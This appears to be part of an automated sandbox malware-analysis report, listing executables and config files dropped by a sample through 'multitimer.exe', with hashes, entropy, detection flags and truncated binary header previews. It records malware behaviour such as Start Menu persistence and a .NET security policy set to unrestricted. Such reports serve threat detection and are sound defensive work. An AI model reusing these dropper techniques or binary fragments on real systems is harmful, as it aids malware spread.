                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):472064
                                                              Entropy (8bit):5.214292910977572
                                                              Encrypted:false
                                                              SSDEEP:3072:g41LuxQJrt7CV9k4X8Z1qbd96Bn/qarg8ABv0BVXkfq+0w1VglNfNKPzd8QsDZsR:b6QG6Bn/VFUi+Z7DUsw8YIp/
                                                              MD5:83BD1D79670EF5335E6533AE8285AB22
                                                              SHA1:B9FDDDE4C6655A262182991A0463F153309E83F7
                                                              SHA-256:7CD97A73F15ABE83611569B675E9C899131C9EA9A00B69D33BE31790BD034176
                                                              SHA-512:9CE068AE614030AFFB45280F33865A280D4014B5D26586C1FEA9AB474E2AA4AE9A4AAA6C05F6756AB8AB357236BDB2A18038D7F0478867E9721E8B0662020480
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0......(.......)... ...@....@.. ....................................@.................................O)..O....@..d%...........................(..8............................................ ............... ..H............text........ ...................... ..`.rsrc...d%...@...&..................@..@.reloc...............2..............@..B.................)......H.......0"..|............,................................................(....*.0..G.......r...p.....r...p.....r...p.....r...p.....r...p.....r)..p.....r...p.....*..0..p.......r...p...(....(....r...pr...po....(....%(....&(....r...pr...po....r...p(....(.......&....(......&.....(......&..*.(......MS........W.._........c..l........(....*Zs....~....(.....o....*..0..f.........,A.......%.~.....%.~.....%.~.....%.~.....%.~.....%.....(....(....&*.~....~....~....~....(....(....&*...0..
                                                              C:\Users\user\AppData\Local\Temp\psllnjovj2s\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\rohxg00x4ut\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\s1knrc5gdfb\v4ondyxg3no.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):721408
                                                              Entropy (8bit):6.793648961271186
                                                              Encrypted:false
                                                              SSDEEP:12288:9p/S3sCPfhmxjjpmt0OlIhtYbJAvSq8ZlUfMcZMSIP/LrvfOh9lSPxTmg++K0E:TeSot0jOFAvS7ZufMcZMT/feh9lEN+4
                                                              MD5:57664817E1CE6474C6FB8201675AC09E
                                                              SHA1:C394CB4643EA0BC6AC762DA6D95F4910957E34CB
                                                              SHA-256:8DB01993653B78C7B862356616241C4C97ADCE8B705522CEFAC90B23E3572845
                                                              SHA-512:D8EA64D8D2F695165E0AA1519348277E93D65C0A19AA810110E49F8F2AA6F015FC892D78C1B4B7B2FD70F933120B9A9887C214DCBDDBD293B8EF5BBF2549C64D
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ g..A.D.A.D.A.D.'.E.A.D.'.E.A.D.'.E.A.D.).E.A.D.).E.A.D.).E.A.D.'.E.A.D.A.D=A.D.(.E.A.D.(.D.A.D.(.E.A.DRich.A.D................PE..L....`.`.............................P............@.......................................@.....................................<................................M..........................@...........@...............0............................text....3.......4.................. ..`.txet.......P.......8.............. ..`.rdata..............................@..@.data...Ld..........................@....rsrc...............................@..@.reloc...M.......N..................@..B................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\uo02buchgfk\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2332000
                                                              Entropy (8bit):7.710319682123012
                                                              Encrypted:false
                                                              SSDEEP:49152:0qeNVO4AFpy6/dV7FuYuiiZQCu9f0BTHgXhfSUHq:BEY42x/NuBgJ0ZgXxxHq
                                                              MD5:57A499F8970931ED49142A0392846212
                                                              SHA1:6F9D93587B0508F278A7D1ED66590F50163A45BD
                                                              SHA-256:4101EB5D347E4D5DF349296B506BFA34443A7D43000902849A22545F455E23C0
                                                              SHA-512:A361DC8085D8CB35FFF1C8650C32E53F4CFD5A717369FD6F512497BE20AD6682270AE1C5CCC162FF56DB010D7D1F1E17869562A4AAED3B8D0E08D1D81C72C0C6
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^.................P...........^.......p....@...................................#...@......@...................@....... ..6....p...F............#.P....................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....F...p...F..................@..@....................................@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\v2nlk34vhpy\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\vvwtlhtocfa\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):472064
                                                              Entropy (8bit):5.214292910977572
                                                              Encrypted:false
                                                              SSDEEP:3072:g41LuxQJrt7CV9k4X8Z1qbd96Bn/qarg8ABv0BVXkfq+0w1VglNfNKPzd8QsDZsR:b6QG6Bn/VFUi+Z7DUsw8YIp/
                                                              MD5:83BD1D79670EF5335E6533AE8285AB22
                                                              SHA1:B9FDDDE4C6655A262182991A0463F153309E83F7
                                                              SHA-256:7CD97A73F15ABE83611569B675E9C899131C9EA9A00B69D33BE31790BD034176
                                                              SHA-512:9CE068AE614030AFFB45280F33865A280D4014B5D26586C1FEA9AB474E2AA4AE9A4AAA6C05F6756AB8AB357236BDB2A18038D7F0478867E9721E8B0662020480
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0......(.......)... ...@....@.. ....................................@.................................O)..O....@..d%...........................(..8............................................ ............... ..H............text........ ...................... ..`.rsrc...d%...@...&..................@..@.reloc...............2..............@..B.................)......H.......0"..|............,................................................(....*.0..G.......r...p.....r...p.....r...p.....r...p.....r...p.....r)..p.....r...p.....*..0..p.......r...p...(....(....r...pr...po....(....%(....&(....r...pr...po....r...p(....(.......&....(......&.....(......&..*.(......MS........W.._........c..l........(....*Zs....~....(.....o....*..0..f.........,A.......%.~.....%.~.....%.~.....%.~.....%.~.....%.....(....(....&*.~....~....~....~....(....(....&*...0..
                                                              C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2332000
                                                              Entropy (8bit):7.710319682123012
                                                              Encrypted:false
                                                              SSDEEP:49152:0qeNVO4AFpy6/dV7FuYuiiZQCu9f0BTHgXhfSUHq:BEY42x/NuBgJ0ZgXxxHq
                                                              MD5:57A499F8970931ED49142A0392846212
                                                              SHA1:6F9D93587B0508F278A7D1ED66590F50163A45BD
                                                              SHA-256:4101EB5D347E4D5DF349296B506BFA34443A7D43000902849A22545F455E23C0
                                                              SHA-512:A361DC8085D8CB35FFF1C8650C32E53F4CFD5A717369FD6F512497BE20AD6682270AE1C5CCC162FF56DB010D7D1F1E17869562A4AAED3B8D0E08D1D81C72C0C6
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^.................P...........^.......p....@...................................#...@......@...................@....... ..6....p...F............#.P....................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....F...p...F..................@..@....................................@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:true
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Roaming\30601988b56f78c9.53290271_102\fpman.dat
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):10
                                                              Entropy (8bit):2.321928094887362
                                                              Encrypted:false
                                                              SSDEEP:3:KUWcn:KUWcn
                                                              MD5:DB58E8966CCA23A36BA5F71BCBCDBD26
                                                              SHA1:9686A47BA4E3B52E7757E4B8C2951B71D65038EF
                                                              SHA-256:E58AFDCAF3F8CE74B86F2DB346CFC00E87490626D8D8777B0FF3EF44F4DC6B8A
                                                              SHA-512:92869CAD71B5E547AA5F87D3124B03AA0B005427A9D2FFEB53B4B55A26B1EC7EA9357AEDB403442E9FE78BF101EE8822AD6364B6E7BA5BAF4C185906B96AD596
                                                              Malicious:false
                                                              Preview: 1613350506
                                                              C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll
                                                              Process:C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):5.400289434075511
                                                              Encrypted:false
                                                              SSDEEP:384:7FOpPzWbCj4oNg+Pg+R+cpNwfheIi8crwvuDbrqtrfcIT6:gRjaFcaIQAr
                                                              MD5:EF0E47D95754B86B573084177B441765
                                                              SHA1:2BDAC0CF18BEC45B12752C5E647C187C1A55FE88
                                                              SHA-256:89963ED6259B809F83D4285D793F12D11514A54AA9BF1E95C6009CAA485FE1CB
                                                              SHA-512:1074D23540147F2DB5FB50AE462E1D02C2E6984AA374C8CDEBEED23CED6FFCFECCAEED010E570EC9C411CAAACA85B85AF11176C761C3FBDD4031A562F41471CA
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J)`...........!.........^......g........@......................................................................0F..D....A..P.......h.......................t....................................................@...............................text....-.......................... ..`.rdata..t....@.......2..............@..@.data....<...P.......:..............@....rsrc...h............>..............@..@.reloc..`............P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.new
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):442
                                                              Entropy (8bit):3.2141702621458994
                                                              Encrypted:false
                                                              SSDEEP:12:AKtPMsK+w6vgXmQHJkcL5nQa1Q2cL5BKhS6:vqr+vvgJGcLWb2cLb
                                                              MD5:D43F2D1F09069D8ABC90BFCB43B6CF0A
                                                              SHA1:8EC889C8E755CD396E8E8D226BDC61C7467B448B
                                                              SHA-256:BC0F9B175D0E97A041CCFC53C885546C832DDF59BDBE828B74B557B72761B245
                                                              SHA-512:33F549F7C2A6BA3DBC0AABAE97508A412D0E1EC94A73A4EA602812DE4134246C6532F887AD865C02477AD844E5E204AEF427A686908D257EDE6A4F849CB1937D
                                                              Malicious:false
                                                              Preview: ..............f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.B.1.S.2.0.6.C.R.D.5./.m.u.l.t.i.t.i.m.e.r...e.x.e...C.o.n.f.i.g...........P.o.l.i.c.y.S.t.a.t.e.m.e.n.t....v.e.r.s.i.o.n...1....P.e.r.m.i.s.s.i.o.n.S.e.t....c.l.a.s.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...P.e.r.m.i.s.s.i.o.n.S.e.t....v.e.r.s.i.o.n...1....U.n.r.e.s.t.r.i.c.t.e.d...t.r.u.e................................................,..........
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):21504
                                                              Entropy (8bit):5.26115349679037
                                                              Encrypted:false
                                                              SSDEEP:384:tOsttJHqI5HvkQcbuHBxnaTlqoUfzWShtFVa7IAdcXdPC3W:8sttdqIJvkQc5TAfiSfFeCC3W
                                                              MD5:85A4C66DAAFB24BC8CE4CE991E65056A
                                                              SHA1:474765C94426CAE2BCBEA59B5484B409CEF97E92
                                                              SHA-256:E6B7845F4100C9DE2B426B501DCE098767FD845AABF35A3F808447494601C353
                                                              SHA-512:D7B9EC2563DDDE646539101D0C1782779424E33BB9F313536993AFC1197BD5B4C81FF35FC8F658A6D76F1B899B601FFDC8D21E60BD46FFCB396CA6CA1D2CEDCC
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*...............0..H...........e... ........@.. ....................................@.................................xe..O...................................\e............................................... ............... ..H............text...PF... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................e......H...........X7...........................................................0..........~....o....s....z&..*.................(....r...p*.0..[........'...(....rW..p(.......+....o.....'...(....r{..p(..... .....,....o......&..r...p(......&..*.........HH..........WW.......s!...%.}0....."...s....(...+,.s....z*...0...........o......&..*.................0...................o.......&...*..................6..o.........*.(.........*2.s....(....*v.(......r...p~....o....(....*2.{....o....*..
                                                              C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):902271
                                                              Entropy (8bit):7.972060876188639
                                                              Encrypted:false
                                                              SSDEEP:24576:4yIEamFBLxha8gP8AEQ4x2dx9zf3iBhrq08Kj:4yMwbgkAEIdx9zf3iBhZTj
                                                              MD5:725F35103362F3F1410216F5ED785A1F
                                                              SHA1:F8971D3A0B17401142BBE27B09A75D0880158027
                                                              SHA-256:012BF7109847ECDA82D27EAC841B18D5294704D0DFE88517842E596E4004FD55
                                                              SHA-512:5A9739AFDEDF18AA4FDF6895BCEE44855C5189E54D3E74A4B1EA79FBCB95A8195A25E8A8B9ED66D0DA91BA462FE20D4BFADBE73468EEF5F22D1292325F6EBE0F
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F...................@..........................P............@......@..............................|.... ...,..........................................................................................................CODE................................ ..`DATA....P...........................@...BSS......................................idata..|...........................@....tls.....................................rdata..............................@..P.reloc.. ...........................@..P.rsrc....,... ...,..................@..P.............P......................@..P........................................................................................................................................
                                                              C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.new
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):442
                                                              Entropy (8bit):3.2141702621458994
                                                              Encrypted:false
                                                              SSDEEP:12:AKtPMsK+w6vgXmQHJkcL5nQa1Q2cL5BKhS6:vqr+vvgJGcLWb2cLb
                                                              MD5:D43F2D1F09069D8ABC90BFCB43B6CF0A
                                                              SHA1:8EC889C8E755CD396E8E8D226BDC61C7467B448B
                                                              SHA-256:BC0F9B175D0E97A041CCFC53C885546C832DDF59BDBE828B74B557B72761B245
                                                              SHA-512:33F549F7C2A6BA3DBC0AABAE97508A412D0E1EC94A73A4EA602812DE4134246C6532F887AD865C02477AD844E5E204AEF427A686908D257EDE6A4F849CB1937D
                                                              Malicious:false
                                                              Preview: ..............f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.B.1.S.2.0.6.C.R.D.5./.m.u.l.t.i.t.i.m.e.r...e.x.e...C.o.n.f.i.g...........P.o.l.i.c.y.S.t.a.t.e.m.e.n.t....v.e.r.s.i.o.n...1....P.e.r.m.i.s.s.i.o.n.S.e.t....c.l.a.s.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...P.e.r.m.i.s.s.i.o.n.S.e.t....v.e.r.s.i.o.n...1....U.n.r.e.s.t.r.i.c.t.e.d...t.r.u.e................................................,..........
                                                              C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.new
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):442
                                                              Entropy (8bit):3.2141702621458994
                                                              Encrypted:false
                                                              SSDEEP:12:AKtPMsK+w6vgXmQHJkcL5nQa1Q2cL5BKhS6:vqr+vvgJGcLWb2cLb
                                                              MD5:D43F2D1F09069D8ABC90BFCB43B6CF0A
                                                              SHA1:8EC889C8E755CD396E8E8D226BDC61C7467B448B
                                                              SHA-256:BC0F9B175D0E97A041CCFC53C885546C832DDF59BDBE828B74B557B72761B245
                                                              SHA-512:33F549F7C2A6BA3DBC0AABAE97508A412D0E1EC94A73A4EA602812DE4134246C6532F887AD865C02477AD844E5E204AEF427A686908D257EDE6A4F849CB1937D
                                                              Malicious:false
                                                              Preview: ..............f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.B.1.S.2.0.6.C.R.D.5./.m.u.l.t.i.t.i.m.e.r...e.x.e...C.o.n.f.i.g...........P.o.l.i.c.y.S.t.a.t.e.m.e.n.t....v.e.r.s.i.o.n...1....P.e.r.m.i.s.s.i.o.n.S.e.t....c.l.a.s.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...P.e.r.m.i.s.s.i.o.n.S.e.t....v.e.r.s.i.o.n...1....U.n.r.e.s.t.r.i.c.t.e.d...t.r.u.e................................................,..........

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):6.040314358960337
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File size:242688
                                                              MD5:cf35edde149e46ee5dcafa4151dd4a81
                                                              SHA1:bd920d23e20dd55fce50c1a4cb6294a65d3fd5d9
                                                              SHA256:576c0f0c427bc26f4f32211bb46a7430085cc5dda994f3c1829921d41236cb09
                                                              SHA512:600e506edcb5b3423f5cd8a7a13138737bab4f639b6d8836093ca069934ac2292b66b3f519de99a8411b7f4a550fb9fe2b6059279cee1dff13f22b2190958dba
